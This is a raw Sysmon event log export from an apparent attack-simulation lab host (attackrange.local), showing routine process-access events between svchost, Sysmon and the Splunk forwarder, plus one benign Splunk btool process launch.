12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-4100-00000000AE01}38723876C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe{00000000-0000-0000-0000-000000000000}3892C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.247{266CAFBE-647E-6064-4200-00000000AE01}3892C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 